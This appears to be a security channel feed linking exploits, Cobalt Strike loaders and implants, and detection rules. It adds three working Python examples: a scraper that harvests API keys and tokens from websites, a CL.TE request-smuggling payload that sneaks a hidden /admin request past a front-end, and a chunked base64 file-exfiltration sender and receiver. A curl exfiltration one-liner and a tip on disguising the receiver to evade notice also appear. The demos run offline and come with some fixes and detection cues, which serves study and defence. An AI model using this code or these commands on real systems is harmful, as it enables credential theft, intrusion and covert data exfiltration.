#exploit
1. CVE-2022-25375:
Demo exploit of RNDIS USB Gadget
https://github.com/szymonh/rndis-co
2. CVE-2022-24112:
Apache APISIX apisix/batch-requests RCE
https://github.com/Mr-xn/CVE-2022-24112
]-> https://github.com/shakeman8/CVE-2022-24112
@BlueRedTeam
#Red_Team
Bash Tricks for Command Execution and Data Extraction over HTTP/S
https://medium.com/maverislabs/bash-tricks-for-command-execution-and-data-extraction-over-http-s-ca76e9c80933
@BlueRedTeam
#Malware
New Sandworm malware Cyclops Blink replaces VPNFilter
https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter
@BlueRedTeam
Attachment: Anti_backdoor.pdf (12.6 MB)
#Blue_Team
"Anti-Backdoor Learning:
Training Clean Models on Poisoned Data", 2021.
]-> Repo: https://github.com/bboylyg/ABL
@BlueRedTeam
#exploit
1. Exploit Development:
ASLR - Coming To A KUSER_SHARED_DATA Structure
https://connormcgarr.github.io/kuser-shared-data-changes-win-11
2. LPE built on the Sunlogin (向日葵, "Sunflower") remote-control RCE, CNVD-2022-10270; the tool locates the service port itself instead of requiring it as an argument
https://github.com/Ryze-T/CNVD-2022-10270-LPE
@BlueRedTeam
#Cobalt_Strike
Cobalt Strike External C2 integration with Azure Service Bus: C2 traffic is relayed through Azure Service Bus (part of the Cobalt Strike community kit)
https://github.com/Cobalt-Strike/community_kit
@BlueRedTeam
#Red_Team
1. Smuggling HTTP requests over fake WebSocket connection
https://github.com/0ang3el/websocket-smuggle
2. JNDI-Injection-Exploit: generates JNDI links and starts the supporting servers (RMI, LDAP, HTTP) needed to exploit JNDI injection vulnerabilities
https://github.com/welk1n/JNDI-Injection-Exploit
3. TeamsImplant: a stealthy Microsoft Teams implant that proxies urlmon.dll (DLL proxying)
https://github.com/Allevon412/TeamsImplant
@BlueRedTeam
#Cobalt_Strike
Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.
https://github.com/boku7/BokuLoader
@BlueRedTeam
#Blue_Team
1. HermeticWiper malware detection rules (KQL)
https://github.com/stripesoc/detections/tree/main/hermeticwiper
2. CVE-2021-31166 Detection Rules
https://github.com/mvlnetdev/CVE-2021-31166-detection-rules
@BlueRedTeam
#exploit
1. CVE-2022-21974:
Roaming Security Rights Management Services
Remote Code Execution Vulnerability
https://github.com/0vercl0k/CVE-2022-21974
2. CVE-2022-21971:
Windows Runtime RCE Vulnerability
https://github.com/0vercl0k/CVE-2022-21971
@BlueRedTeam
#tools
Fuzzing Network Applications with AFL and libdesock
https://lolcads.github.io/posts/2022/02/libdesock
]-> A de-socketing library for fuzzing:
https://github.com/fkie-cad/libdesock
@BlueRedTeam
#tools
#Red_Team
1. GoldenCopy: copies the properties and group memberships of a user from Neo4j (BloodHound) to forge an identical golden ticket
https://github.com/Dramelac/GoldenCopy
2. Jbin Website Secret Scraper: gathers all URLs from a website and then tries to expose secrets found in them, such as API keys, tokens and other sensitive data
https://github.com/h33tlit/Jbin-website-secret-scraper
@BlueRedTeam
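What a website secret scraper such as the Jbin tool above actually does is small: collect the script URLs referenced by a page, fetch each one and run a set of credential patterns over the text. The block below is an added example written for this page, not Jbin's own code. It scans a constructed HTML page and JavaScript file; the keys in the sample are fake strings that merely match the documented formats (the AWS one is Amazon's published example key), the fetch function is injected so the example runs offline, and the entropy threshold is a heuristic that needs tuning per target.

```python
import math
import re
from typing import Callable, List, Tuple

# Format-based patterns for well-known credential types.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "slack_token": re.compile(r"\bxox[abprs]-[0-9A-Za-z\-]{10,}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}
# Heuristic: a secret-looking identifier assigned a quoted literal. Noisy on its
# own, so hits are filtered by entropy below.
GENERIC = re.compile(r"(?i)\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*['\"]([^'\"]{8,})['\"]")
SCRIPT_URL = re.compile(r"(?:src|href)\s*=\s*['\"]([^'\"]+\.js(?:\?[^'\"]*)?)['\"]", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character; placeholder values like 'changeme' score low."""
    return -sum((s.count(c) / len(s)) * math.log2(s.count(c) / len(s)) for c in set(s))


def extract_script_urls(html: str) -> List[str]:
    """Crawler step: every .js resource the page references."""
    return SCRIPT_URL.findall(html)


def scan_text(source: str, text: str, min_entropy: float = 3.0) -> List[Tuple[str, str, str]]:
    """Return (source, pattern_name, value) for each candidate secret in text."""
    hits, seen = [], set()
    for name, rx in PATTERNS.items():
        for m in rx.finditer(text):
            hits.append((source, name, m.group(0)))
            seen.add(m.group(0))
    for m in GENERIC.finditer(text):
        value = m.group(2)
        # skip values already reported by a specific pattern and low-entropy placeholders
        if value in seen or shannon_entropy(value) < min_entropy:
            continue
        hits.append((source, "generic_secret", value))
    return hits


def scan_site(html: str, fetch: Callable[[str], str]) -> List[Tuple[str, str, str]]:
    """Scan the page itself, then every script it references. fetch(url) -> str
    is injected (hypothetical helper) so this runs without network access."""
    findings = scan_text("index.html", html)
    for url in extract_script_urls(html):
        findings.extend(scan_text(url, fetch(url)))
    return findings


# Constructed sample page and script; all credential values below are fake.
SAMPLE_HTML = '<html><head><script src="/static/app.js"></script></head><a href="x.html">x</a></html>'
SAMPLE_JS = {
    "/static/app.js": (
        'var cfg = {apiKey: "AIzaSyD-FAKEFAKEFAKEFAKEFAKEFAKE1234567", region: "us-east-1"};\n'
        'const AWS_KEY = "AKIAIOSFODNN7EXAMPLE";\n'
        'password = "changeme";\n'
        'token = "e7b1c9a4f2d8b6e3a1c5f7d9b2e4a6c8";\n'
    ),
}

if __name__ == "__main__":
    for src, name, value in scan_site(SAMPLE_HTML, SAMPLE_JS.__getitem__):
        print(f"{src}: {name} -> {value}")
```

Two design points matter more than the regex list: deduplicate so a Google key is not reported twice (once by format, once by the generic rule), and gate the generic rule on entropy so the output is not dominated by `password = "changeme"` style placeholders. Real scrapers add many more formats and also follow inline `<script>` bodies and source maps.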
#Blue_Team
HTTP Desync Attacks:
Request Smuggling Reborn
https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
]-> HTTP request smuggling vulnerability scanner:
https://github.com/Sh1Yo/request_smuggler
@BlueRedTeam
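Both the WebSocket smuggling entry above and the PortSwigger desync research rest on the same fault: two hops in the chain disagree about where one request ends and the next begins. The block below is an added example for this page, not code from PortSwigger, request_smuggler or websocket-smuggle. It uses two deliberately simplified parsers, one that honours Content-Length (the CL front-end) and one that honours Transfer-Encoding: chunked (the TE back-end), and feeds both the same constructed byte stream to show the classic CL.TE split: the front-end forwards one request, the back-end sees two, and the hidden one swallows the victim's request line into an `X-Ignore` header. Nothing here touches a network.

```python
from typing import Dict, List, Tuple

CRLF = b"\r\n"


def parse_headers(head: bytes) -> Dict[bytes, bytes]:
    """Lower-cased header map for one request head (request line excluded)."""
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers


def read_chunked(stream: bytes, pos: int) -> Tuple[bytes, int]:
    """Decode a chunked body starting at pos; return (body, position after it)."""
    body = b""
    while True:
        line_end = stream.index(CRLF, pos)
        size = int(stream[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            # the zero-size chunk is followed by an (empty) trailer line
            return body, stream.index(CRLF, pos) + 2
        body += stream[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def consume_request(stream: bytes, prefer: str) -> Tuple[bytes, bytes, bytes]:
    """Parse one request off the front of stream.
    prefer is "cl" or "te": which header wins when both are present,
    which is exactly the disagreement request smuggling exploits.
    Returns (request_line, body, unconsumed_bytes)."""
    head_end = stream.index(CRLF + CRLF)
    head, pos = stream[:head_end], head_end + 4
    headers = parse_headers(head)
    request_line = head.split(CRLF, 1)[0]
    chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
    has_cl = b"content-length" in headers
    if chunked and (prefer == "te" or not has_cl):
        body, pos = read_chunked(stream, pos)
    elif has_cl:
        length = int(headers[b"content-length"])
        body, pos = stream[pos:pos + length], pos + length
    else:
        body = b""
    return request_line, body, stream[pos:]


def requests_seen(stream: bytes, prefer: str) -> List[bytes]:
    """Request lines a parser with the given preference sees on one connection."""
    seen = []
    while CRLF + CRLF in stream:
        line, _body, stream = consume_request(stream, prefer)
        seen.append(line)
    return seen


def build_cl_te_payload(smuggled: bytes) -> bytes:
    """Attacker request carrying a hidden request in its body (constructed sample).
    Content-Length covers the whole body, so a CL front-end forwards all of it;
    the chunked terminator makes a TE back-end stop after zero bytes, leaving
    `smuggled` as the start of the *next* request on that back-end connection."""
    body = b"0" + CRLF + CRLF + smuggled
    return (b"POST / HTTP/1.1" + CRLF
            + b"Host: victim.example" + CRLF
            + b"Content-Length: " + str(len(body)).encode() + CRLF
            + b"Transfer-Encoding: chunked" + CRLF + CRLF
            + body)


# The hidden request ends in a dangling header so the next user's request line
# is absorbed as that header's value instead of being parsed as a request.
SMUGGLED = b"GET /admin HTTP/1.1" + CRLF + b"Host: victim.example" + CRLF + b"X-Ignore: "
VICTIM = b"GET /index HTTP/1.1" + CRLF + b"Host: victim.example" + CRLF + CRLF


def demo() -> Tuple[List[bytes], List[bytes]]:
    """Same bytes on the wire; what the CL front-end and TE back-end each see."""
    wire = build_cl_te_payload(SMUGGLED) + VICTIM
    return requests_seen(wire, "cl"), requests_seen(wire, "te")


if __name__ == "__main__":
    front, back = demo()
    print("front-end (CL) saw:", front)
    print("back-end  (TE) saw:", back)
```

The fix is the one the research recommends: normalise at the edge, reject requests carrying both headers (or any obfuscated Transfer-Encoding value), and close the back-end connection whenever the two hops would disagree. The same reasoning applies to the WebSocket case, where the front-end believes a tunnel has been upgraded while the back-end keeps parsing HTTP.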
#Red_Team
Into the art of Binary Exploitation
Part 4 - Reviving of Satanic-ROP
https://infosecwriteups.com/into-the-art-of-binary-exploitation-0x000004-reviving-of-satanic-rop-5ab604b52341
@BlueRedTeam
#exploit
1. CVE-2021-30955:
Apple macOS Kernel Race Condition
https://gist.github.com/jakeajames/37f72c58c775bfbdda3aa9575149a8aa
2. CVE-2021-3489:
Exploitation Analysis of Linux Kernel eBPF RINGBUF Out-of-Bounds Access Vulnerability
https://mp.weixin.qq.com/s/biSNUlzZqqcYiYwfMSaTeg
@BlueRedTeam
#Blue_Team
1. find-sec-bugs: the SpotBugs plugin for security audits of Java web applications and Android applications (also works with Kotlin, Groovy and Scala projects)
https://github.com/find-sec-bugs/find-sec-bugs
2. SOC Skills:
How to Detect Good Apps Gone Bad
https://www.intezer.com/blog/malware-analysis/how-to-detect-legitimate-apps-used-by-attackers
@BlueRedTeam
#Red_Team
1. Golden gMSA Attack
https://www.semperis.com/blog/golden-gmsa-attack
2. Bash Tricks for File Exfiltration over HTTP/S using Flask
https://medium.com/maverislabs/bash-tricks-for-file-exfiltration-over-http-s-using-flask-112aed524ad
@BlueRedTeam
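The two Bash exfiltration posts on this page (the command-execution/data-extraction one above and this Flask one) describe the same pattern: a small HTTP receiver the operator controls, and a sender that base64-encodes a file, splits it into chunks and POSTs each one. The block below is an added example written for this page, not the posts' own scripts; it replaces Flask with the Python standard library so both ends run offline on 127.0.0.1, the `X-File`/`X-Chunk` headers and the `/upload` path are made-up conventions, and the payload is a constructed sample.

```python
import base64
import hashlib
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, Tuple


class CollectingHandler(BaseHTTPRequestHandler):
    """Receiver side: store each POSTed chunk under (filename, chunk index)."""
    chunks: Dict[Tuple[str, int], bytes] = {}

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        data = self.rfile.read(length)
        name = self.headers.get("X-File", "unknown")      # hypothetical header names
        idx = int(self.headers.get("X-Chunk", 0))
        self.chunks[(name, idx)] = data
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_receiver(port: int = 0) -> HTTPServer:
    """Bind on loopback (port 0 = ephemeral) and serve from a background thread."""
    srv = HTTPServer(("127.0.0.1", port), CollectingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def exfiltrate(url: str, name: str, payload: bytes, chunk_size: int = 48) -> int:
    """Sender side: base64 the payload, split it, POST each piece with its index
    so the receiver can reassemble even if pieces arrive out of order.
    Returns the number of chunks sent."""
    encoded = base64.b64encode(payload)
    count = 0
    for offset in range(0, len(encoded), chunk_size):
        req = urllib.request.Request(
            url, data=encoded[offset:offset + chunk_size], method="POST",
            headers={"X-File": name, "X-Chunk": str(offset // chunk_size)})
        with urllib.request.urlopen(req, timeout=5) as resp:
            if resp.status != 200:
                raise RuntimeError(f"receiver returned {resp.status}")
        count += 1
    return count


def reassemble(chunks: Dict[Tuple[str, int], bytes], name: str) -> bytes:
    """Receiver side: order the chunks for one file and decode them."""
    parts = sorted((idx, data) for (n, idx), data in chunks.items() if n == name)
    return base64.b64decode(b"".join(data for _, data in parts))


def run_demo() -> Tuple[int, bool]:
    """Round-trip a constructed file through the loopback receiver.
    Returns (chunks_sent, payload_intact)."""
    srv = start_receiver()
    url = f"http://127.0.0.1:{srv.server_address[1]}/upload"
    secret = b"constructed sample: db_password=...\n" * 4   # 144 bytes -> 4 chunks
    try:
        sent = exfiltrate(url, "notes.txt", secret)
        received = reassemble(CollectingHandler.chunks, "notes.txt")
    finally:
        srv.shutdown()
    intact = hashlib.sha256(received).digest() == hashlib.sha256(secret).digest()
    return sent, intact


if __name__ == "__main__":
    print(run_demo())
```

The Bash equivalent of the sender is what the posts are about: `base64 -w0 file | fold -w 48` for the chunking and `curl -s -X POST --data-binary @- -H "X-File: notes.txt" -H "X-Chunk: $i" "$URL"` per piece. From the blue-team side the same structure is the detection: many small POSTs to one external host, identical custom headers and base64-only bodies, which is why the receiver in the original post is worth keeping behind HTTPS and a plausible path.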